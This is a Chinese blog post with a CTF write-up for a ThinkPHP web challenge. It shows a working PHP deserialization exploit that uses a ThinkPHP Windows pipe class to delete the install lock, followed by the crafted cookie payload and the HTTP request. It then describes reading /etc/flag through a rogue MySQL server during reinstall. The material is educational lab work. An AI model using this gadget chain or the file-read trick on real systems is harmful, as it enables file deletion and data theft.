<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <!-- hexo-inject:begin --><!-- hexo-inject:end --><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,">





  <link rel="alternate" href="/atom.xml" title="SG's Blog" type="application/atom+xml">






<meta name="description" content="kun神推荐了一个不错的tp题，正巧最近看了一段时间tp，就去看了下。 题目地址：kun神CTF_WEB-400-13 STEP1 任意文件删除www.zip 读了一下，发现逻辑很简单，也没啥可能出漏洞的地方，题目要求是读/etc/flag，所以大致有以下几种想法：121. 能否反序列化来任意文件读取或getshell2. mysql的地址是可控的，能否删除lock重装来连接远程数据库任意文件读">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="记一道有意思的TP题">
<meta property="og:url" content="http://love-sg.me/2019/01/31/记一道有意思的TP题/index.html">
<meta property="og:site_name" content="SG&#39;s Blog">
<meta property="og:description" content="kun神推荐了一个不错的tp题，正巧最近看了一段时间tp，就去看了下。 题目地址：kun神CTF_WEB-400-13 STEP1 任意文件删除www.zip 读了一下，发现逻辑很简单，也没啥可能出漏洞的地方，题目要求是读/etc/flag，所以大致有以下几种想法：121. 能否反序列化来任意文件读取或getshell2. mysql的地址是可控的，能否删除lock重装来连接远程数据库任意文件读">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8400344-9b16cbbfc3eb7588.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8400344-7d49294ea0dbf5c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:image" content="https://upload-images.jianshu.io/upload_images/8400344-a357c4e83310d653.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">
<meta property="og:updated_time" content="2019-04-25T15:04:12.329Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="记一道有意思的TP题">
<meta name="twitter:description" content="kun神推荐了一个不错的tp题，正巧最近看了一段时间tp，就去看了下。 题目地址：kun神CTF_WEB-400-13 STEP1 任意文件删除www.zip 读了一下，发现逻辑很简单，也没啥可能出漏洞的地方，题目要求是读/etc/flag，所以大致有以下几种想法：121. 能否反序列化来任意文件读取或getshell2. mysql的地址是可控的，能否删除lock重装来连接远程数据库任意文件读">
<meta name="twitter:image" content="https://upload-images.jianshu.io/upload_images/8400344-9b16cbbfc3eb7588.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://love-sg.me/2019/01/31/记一道有意思的TP题/">





  <title>记一道有意思的TP题 | SG's Blog</title><!-- hexo-inject:begin --><!-- hexo-inject:end -->
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <!-- hexo-inject:begin --><!-- hexo-inject:end --><div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">SG's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一直划水,偶尔学习</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            站点地图
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://love-sg.me/2019/01/31/记一道有意思的TP题/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="ShadowGlint">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SG's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">记一道有意思的TP题</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-01-31T17:53:08+08:00">
                2019-01-31
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>kun神推荐了一个不错的tp题，正巧最近看了一段时间tp，就去看了下。</p>
<p>题目地址：<a href="https://github.com/wonderkun/CTF_web/tree/master/web400-13" target="_blank" rel="noopener">kun神CTF_WEB-400-13</a></p>
<h3 id="STEP1-任意文件删除"><a href="#STEP1-任意文件删除" class="headerlink" title="STEP1 任意文件删除"></a>STEP1 任意文件删除</h3><p><strong><a href="http://www.zip" target="_blank" rel="noopener">www.zip</a></strong></p>
<p>读了一下，发现逻辑很简单，也没啥可能出漏洞的地方，题目要求是读<code>/etc/flag</code>，所以大致有以下几种想法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1. 能否反序列化来任意文件读取或getshell</span><br><span class="line">2. mysql的地址是可控的，能否删除lock重装来连接远程数据库任意文件读</span><br></pre></td></tr></table></figure></p>
<p>先来尝试下第一个想法，看看能不能找到TP中的魔术方法中能进行敏感操作的类。</p>
<p><code>grep -l &#39;c&#39; $(grep -l &#39;b&#39; $(grep -Rl &#39;a&#39; 2&gt;/dev/null))</code> 这样能方便的找某个文件中有某几个关键字</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8400344-9b16cbbfc3eb7588.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<p>找到一个，用他的remove方法<br><a id="more"></a><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">removeFiles</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">foreach</span> (<span class="keyword">$this</span>-&gt;files <span class="keyword">as</span> $filename) &#123;</span><br><span class="line">        <span class="keyword">if</span> (file_exists($filename)) &#123;</span><br><span class="line">            @unlink($filename);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;files = [];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>看下反序列化的点，非常明显，info可以由经过和key进行简单运算得到。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">getSessionUser</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $info = decode(\think\Cookie::get(<span class="string">'info'</span>));</span><br><span class="line">    <span class="keyword">if</span>(is_array($info) &amp;&amp; <span class="keyword">isset</span>($info[<span class="string">'username'</span>]) &amp;&amp; <span class="keyword">isset</span>($info[<span class="string">'password'</span>]))&#123;</span><br><span class="line">        $user = \think\Db::name(<span class="string">'users'</span>)</span><br><span class="line">            -&gt;where(<span class="string">'username'</span>,<span class="string">'='</span>,$info[<span class="string">'username'</span>])</span><br><span class="line">            -&gt;where(<span class="string">'password'</span>,<span class="string">'='</span>,$info[<span class="string">'password'</span>])</span><br><span class="line">            -&gt;find();</span><br><span class="line">        \think\Session::set(<span class="string">'privilege'</span>,$user[<span class="string">'id'</span>]);</span><br><span class="line">        \think\Session::set(<span class="string">'username'</span>,$user[<span class="string">'username'</span>]);</span><br><span class="line">        \think\Cookie::set(<span class="string">'info'</span>,encode($user));</span><br><span class="line">        <span class="keyword">return</span> $user[<span class="string">'id'</span>];</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">unset</span>($info);</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">decode</span><span class="params">($info)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $key = CS;</span><br><span class="line">    $info = urldecode($info);</span><br><span class="line">    $kl = strlen($key);</span><br><span class="line">    $il = strlen($info);</span><br><span class="line">    <span class="keyword">for</span>($i = <span class="number">0</span>; $i &lt; $il; $i++)</span><br><span class="line">    &#123;</span><br><span class="line">        $p = $i%$kl;</span><br><span class="line">        $info[$i] = chr(ord($info[$i])-ord($key[$p]));</span><br><span class="line">    &#125;</span><br><span class="line">    $info = unserialize($info);</span><br><span class="line">    <span class="keyword">return</span> $info;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>构造下反序列化exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace think\process\pipes;</span><br><span class="line">define(&apos;CS&apos;,md5(base64_encode(&apos;139.199.203.253:8888&apos;)));</span><br><span class="line"></span><br><span class="line">abstract class Pipes&#123;&#125;</span><br><span class="line"></span><br><span class="line">class Windows extends Pipes&#123;</span><br><span class="line">	private $files = [&apos;./public/install.lock&apos;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$a = new Windows();</span><br><span class="line"></span><br><span class="line">function encode($info)</span><br><span class="line">&#123;</span><br><span class="line">	$info = serialize($info);</span><br><span class="line">	$key = CS;</span><br><span class="line">	$kl = strlen($key);</span><br><span class="line">	$il = strlen($info);</span><br><span class="line">	for($i = 0; $i &lt; $il; $i++)</span><br><span class="line">	&#123;</span><br><span class="line">		$p = $i%$kl;</span><br><span class="line">		$info[$i] = chr(ord($info[$i])+ord($key[$p]));</span><br><span class="line">	&#125;</span><br><span class="line">	echo urlencode($info);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">encode($a);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>发包,注意触发getSessionUser的条件是session中没有获取不到你的privilege，所以要不带sessionid请求。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /index.php/index/login HTTP/1.1</span><br><span class="line">Host: 139.199.203.253:8888</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line">Referer: http://139.199.203.253:8888/index.php/index/login.html</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: info=%80%A0%94%9Cq%87%DA%9C%A1%A3%D1%95%A9%D5%A5%93%C6%A3%A5%91%A9%9F%A1%C7%D6%92%BD%9F%A2%C8%A3%A9%A4%88%9C%96q%E0%D9nki%A0%5B9%D7%9E%99%CF%9B%8E%A5%AB%A5%94%C7%D6%A9%C2%A6%9D%D4%99%A5%8D%BD%CB%D3%9B%D4%DD%A78%9B%CF%A5%9E%D6Xk%C2jco%B4%9Fk%92%9E%A9%A0he%9EV%60%60%D6%D7%C7%A3%CE%C9c%A1%A3%D9%AD%9A%CF%A2%5E%CD%9F%95%A0%5Bq%AE%DF</span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure>
<p><img src="https://upload-images.jianshu.io/upload_images/8400344-7d49294ea0dbf5c6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<h3 id="STEP2-mysql本地文件读取"><a href="#STEP2-mysql本地文件读取" class="headerlink" title="STEP2 mysql本地文件读取"></a>STEP2 mysql本地文件读取</h3><p>重装时，看下地址可控，想到之前突然火起来的老洞–mysql本地文件读取，phpmyadmin也有这个漏洞。</p>
<p><a href="https://github.com/allyshka/Rogue-MySql-Server" target="_blank" rel="noopener">https://github.com/allyshka/Rogue-MySql-Server</a> 起一个mysql，注意题目中mysqli_connect函数并未传入端口，所以必须用3306，python脚本可行，php的不行，不知为啥。。</p>
<p><img src="https://upload-images.jianshu.io/upload_images/8400344-a357c4e83310d653.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt=""></p>
<p>参考链接：<br><a href="http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/" target="_blank" rel="noopener">http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/</a><br><a href="https://www.vulnspy.com/cn-phpmyadmin-load-data-local-file-read-local-file/" target="_blank" rel="noopener">https://www.vulnspy.com/cn-phpmyadmin-load-data-local-file-read-local-file/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/01/22/日常学习记录/" rel="next" title="日常学习记录">
                <i class="fa fa-chevron-left"></i> 日常学习记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/02/17/内网tips持续更新/" rel="prev" title="内网tips持续更新">
                内网tips持续更新 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">ShadowGlint</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#STEP1-任意文件删除"><span class="nav-number">1.</span> <span class="nav-text">STEP1 任意文件删除</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#STEP2-mysql本地文件读取"><span class="nav-number">2.</span> <span class="nav-text">STEP2 mysql本地文件读取</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ShadowGlint</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script><!-- hexo-inject:begin --><!-- Begin: Injected MathJax -->
<script type="text/x-mathjax-config">
  MathJax.Hub.Config("");
</script>

<script type="text/x-mathjax-config">
  MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
      all[i].SourceElement().parentNode.className += ' has-jax';
    }
  });
</script>

<script type="text/javascript" src="">
</script>
<!-- End: Injected MathJax -->
<!-- hexo-inject:end -->



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
